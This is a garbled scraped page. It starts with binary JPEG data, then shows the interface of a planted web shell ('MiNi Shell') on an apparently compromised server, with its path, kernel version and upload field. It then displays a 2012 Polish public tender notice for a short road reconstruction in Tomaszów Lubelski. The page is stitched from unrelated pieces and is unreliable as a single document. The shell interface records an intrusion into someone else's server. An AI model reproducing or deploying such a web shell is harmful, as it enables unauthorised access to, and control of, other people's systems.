JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/254598-N-2012.html

<p class="kh_header"><b>Tomaszów Lubelski: Przebudowa odcinka drogi powiatowej na terenie gminy Lubycza Król.
Nr 3537L odc. Lubycza Król - Dęby dł. 0,200 km wraz z przebudową zjazdu na drogę osiedlową</b><br>
<b>Numer ogłoszenia: 254598 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Lwowska 54, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6643045, faks 084 6642273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdptomaszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa odcinka drogi powiatowej na terenie gminy Lubycza Król.
Nr 3537L odc. Lubycza Król - Dęby dł. 0,200 km wraz z przebudową zjazdu na drogę osiedlową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa odcinka drogi powiatowej na terenie gminy Lubycza Król.
Nr 3537L odc. Lubycza Król. - Dęby - dł. 0,200 km wraz z przebudową zjazdu na droge osiedlową
W  ramach  inwestycji wykonane zostaną między innymi następujące roboty budowlane: 
- Wyrównanie istniejącej podbudowy mieszanka mineralno bitumiczna asfaltową mechanicznie w ilości 91,00 ton,
- nawierzchnia z mieszanek mineralno-bitumicznych asfaltowych o grubości 3cm warstwa ścieralna w ilości 1112,50 m2
- plantowanie i regulacja poboczy w ilości 750,00 m2,
- rozebranie nawierzchni z płyt żelbetowych prefabrykowanych 300x100x20 - bez odwozu w ilości 60,00 m
- rozebranie krawężników betonowych na podsypce piaskowej w ilości 12,00 m
- ułożenie krawężników betonowych wystających o wymiarach 15x30 cm z wykonaniem ław betonowych z oporem na podsypce cementowo-piaskowej w ilości 30 m
- roboty ziemne wykonane koparkami podsiębiernymi w ilości 12,70 m3
- profilowanie i zagęszczanie podłoża wykonywane ręcznie w ilości 63,50 m3
- podbudowy betonowe 5,0 MPa w ilości 63,50 m2
- warstwa górna podbudowy z kruszyw łamanych stabilizowanych mechanicznie gr. 10 cm w ilości 63,50 m2
- nawierzchnie z mieszanek mineralno - bitumicznych asfaltowych o grubości 5 cm w ilości 63,50  m2
- obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej w ilości 10,00 m
- profilowanie i zagęszczanie podłoża wykonywane ręcznie w ilości 15,00 m2
- chodniki z kostki brukowej betonowej grubości 6 cm w ilości 15 m2
Zakres robót niezbędnych do wykonania i ich lokalizacja zostały  opisane w uproszczonej dokumentacji projektowej tego zadania, w specyfikacjach technicznych wykonania i odbioru robót budowlanych oraz w przedmiarze robót stanowiących załączniki do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania- Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w
postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w
postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w
postępowaniu zgodnie z art. 22 ust. 1 ustawy Prawa zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia do wykonania zamówienia - 
Zamawiający uzna w/w warunek za spełniony w odniesieniu do wykonawców, którzy  muszą spełnić następujące warunki, (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie) spełnią warunek posiadania wiedzy i doświadczenia, tj.: wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej jedną robotę budowlaną z udziałem robót nawierzchniowych z mieszanek asfaltowych o wartości zadania co najmniej 200 000,00 zł(słownie: dwieście tysięcy złotych) PLN brutto oraz potwierdzą, że te roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykaz robót budowlanych, oraz dokumenty potwierdzające, że te roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, (np.: protokoły odbioru lub przedstawienia stosownego potwierdzenia odbiorcy robót). 
 Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień podpisania Protokołu odbioru robót lub równoważnego dokumentu.
W rozumieniu art. 23 ust. 1
Wykonawcy mogą ubiegać się wspólnie o udzielnie zamówienia, żaden z nich nie może podlegać
wykluczeniu z powodu niespełniania warunków o których mowa w art. 24 ust. 1 ustawy Pzp,
natomiast spełnianie warunków wskazanych w art. 22 ust. 1 ustawy Pzp i których opis sposobu
dokonania oceny spełnienia został zamieszczony w pkt 5.1-5.4 SIWZ, Wykonawcy wykazują
łącznie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do
reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych
przez wykonawcę dokumentów i oświadczeń na zasadzie spełnia/nie spełnia. Z treści złożonych
dokumentów musi jednoznacznie wynikać, iż wyżej wymienione warunki zostały spełnione przez
wykonawcę. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy podlegają
wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć dostępne w celu realizacji zamówienia następujące narzędzia, wyposażenie zakładu i urządzenia techniczne, wymienione w poniższej tabeli: 
1	wytwórnia mas bitumicznych o wydajności minimum 30 t/h ze sterowaniem w pełni automatycznym	1
2	rozkładarka mieszanek mineralno-bitumicznych o szerokości min. 3,0m ze sterowaniem automatycznym	1
3	samochód samowyładowczy ładowności min. 10t	1
4	walec statyczny samojezdny	2
5	walec statyczny ogumiony	1
Jeżeli wykonawca nie dysponuje w/w potencjałem technicznym, to przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia w/w sprzętu niezbędnego do realizacji zamówienia.
W rozumieniu art. 23 ust. 1
Wykonawcy mogą ubiegać się wspólnie o udzielnie zamówienia, żaden z nich nie może podlegać
wykluczeniu z powodu niespełniania warunków o których mowa w art. 24 ust. 1 ustawy Pzp,
natomiast spełnianie warunków wskazanych w art. 22 ust. 1 ustawy Pzp i których opis sposobu
dokonania oceny spełnienia został zamieszczony w pkt 5.1-5.4 SIWZ, Wykonawcy wykazują
łącznie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do
reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych
przez wykonawcę dokumentów i oświadczeń na zasadzie spełnia/nie spełnia. Z treści złożonych
dokumentów musi jednoznacznie wynikać, iż wyżej wymienione warunki zostały spełnione przez
wykonawcę. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy podlegają
wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają minimalne kwalifikacje zawodowe, odpowiednie do funkcji, jakie zostaną im powierzone. Wykonawca, na każdą funkcję wymienioną poniżej, wskaże osoby, które spełniają następujące wymagania: 
-osoba proponowana do pełnienia funkcji Kierownik budowy 
-   minimalna liczba osób: 1
-  minimalne kwalifikacje zawodowe: minimum 3 letnie doświadczenie zawodowe jako, kierownik budowy. Osoba ta powinna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej Jeżeli wykonawca nie dysponuje w/w osobami, to przedstawi pisemne  zobowiązanie innych podmiotów do udostępnienia w/w osób  które będą uczestniczyć w realizacji zamówienia.
W rozumieniu art. 23 ust. 1
Wykonawcy mogą ubiegać się wspólnie o udzielnie zamówienia, żaden z nich nie może podlegać
wykluczeniu z powodu niespełniania warunków o których mowa w art. 24 ust. 1 ustawy Pzp,
natomiast spełnianie warunków wskazanych w art. 22 ust. 1 ustawy Pzp i których opis sposobu
dokonania oceny spełnienia został zamieszczony w pkt 5.1-5.4 SIWZ, Wykonawcy wykazują
łącznie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do
reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych
przez wykonawcę dokumentów i oświadczeń na zasadzie spełnia/nie spełnia. Z treści złożonych
dokumentów musi jednoznacznie wynikać, iż wyżej wymienione warunki zostały spełnione przez
wykonawcę. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy podlegają
wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 Prawa zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ustawy - Prawo zamówień publicznych przewiduje możliwość dokonania
zmian postanowień zawartej umowy w stosunku do treści oferty polegających na: 1)zmianie rozwiązań
technicznych w dokumentacji projektowej wykonania zamówienia: a) na wniosek Wykonawcy, za zgodą
Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania
elementów robót; dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest
równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt, a Wykonawca nie będzie żądał
zwiększenia wynagrodzenia za wykonywane roboty; w tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami; projekt wymaga zatwierdzenia przez
nadzór autorski /projektanta/, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego; powyższe
zmiany nie mogą zmieniać terminu zakończenia robót, b) w przypadku, gdy wystąpią roboty dodatkowe nie
objęte zamówieniem podstawowym niezbędne do jego prawidłowego wykonania, których wykonanie stało się
konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i nie mające wpływu na termin
zakończenia zamówienia podstawowego, Zamawiający udzieli dodatkowego zamówienia na ich wykonanie w
trybie wynikającym z ustawy - Prawo zamówień publicznych, c)w przypadku, gdy z punktu widzenia
Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, sporządza
on protokół konieczności, a następnie dostarcza dokumentację projektową na te roboty; zmiany techniczne
mogą powodować zmianę terminu zakończenia zamówienia podstawowego. 2)zmianie terminu zakończenia
zamówienia podstawowego: a)spowodowanej warunkami atmosferycznymi - w przypadku wystąpienia klęski
żywiołowej lub gdy warunki atmosferyczne odbiegają od warunków określonych w SST i uniemożliwiają
prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów,
b)spowodowanej warunkami geologicznymi, wystąpieniem wykopalisk i odkryć archeologicznych oraz o
znaczeniu historycznym, bądź wystąpieniem niewybuchów, niewypałów uniemożliwiających prowadzenie
robót; wszystkie przedmioty o znaczeniu historycznym lub też przedstawiające znaczną wartość odkryte na
terenie budowy, będą przekazane pod opiekę konserwatora zabytków; Wykonawca wówczas niezwłocznie
zabezpieczy znaleziska przed osobami trzecimi, oraz niezwłoczne powiadomi inspektora nadzoru o takich
odkryciach i wykona jego polecenia, co do obchodzenia się z nimi i dalszego trybu postępowania. 3)zmianie
dotyczącej zakresu robót i wynagrodzenia, jeżeli wystąpią: a)nieprzewidziane kolizje z robotami prowadzonymi
równolegle przez inne podmioty; w takim przypadku zmiany w umowie zostaną ograniczone do zmian
powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii,
lokalizacji wbudowywanych urządzeń oraz zmiana terminu i wynagrodzenia; b)okoliczności powodujące
zmniejszenie zakresu przedmiotu zamówienia; w przypadku zakresu przedmiotu zamówienia przez
Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty pozostaje w takim stosunku do
umownego wynagrodzenia, w jakim wykonane roboty budowlane pozostają do całości robót określonych
umową; 4)zmianie osobowej: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na
inne spełniające warunki określone w SIWZ lub zmiana - za zgodą Zamawiającego, podwykonawców nie
wskazanych w ofercie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom);
zmiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury
zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ, 5) zmianie warunków płatności na
rzecz Wykonawcy na skutek zmian zawartej przez Zmawiającego umowy o dofinansowanie projektu, 6)
zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i
któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią Wykonawcy
wykonanie w części lub całości jego zobowiązań; jeżeli wykonanie umowy jest niemożliwe z powodu siły
wyższej to inspektor nadzoru zaświadczy, że wykonanie umowy jest niemożliwe; Wykonawca zabezpieczy
teren budowy tak szybko jak jest to możliwe i wstrzyma roboty, a Zamawiający zapłaci wynagrodzenie za wykonane roboty; 7)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na
realizację przedmiotu zamówienia lub świadczenia Stron; 8)konieczności usunięcia powstałych rozbieżności
lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana
będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej
zapisów przez Strony, 9)zmianie w celu usunięcia zaistniałych w umowie omyłek pisarskich lub
rachunkowych. 3.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może
wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez
Zamawiającego jak i przez Wykonawcę. 4. Prawa i obowiązki wynikające z niniejszej umowy nie mogą być
przenoszone bez zgody Stron na rzecz osób trzecich. 5. Zakres świadczenia wykonawcy wynikający z umowy
jest tożsamy z jego zobowiązaniem zawartym w ofercie. 6. Umowa jest nieważna w części wykraczającej
poza określenie przedmiotu zamówienia zawartego w specyfikacji istotnych warunków zamówienia. 7.
Wszelkie zmiany i uzupełnienia treści Umowy pod rygorem nieważności muszą być dokonywane wyłącznie w
formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdptomaszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych 
ul. Lwowska 54
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2012 godzina 12:00, miejsce: Zarząd Dróg Powiatowych 
ul. Lwowska 54
22-600 Tomaszów Lubelski
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com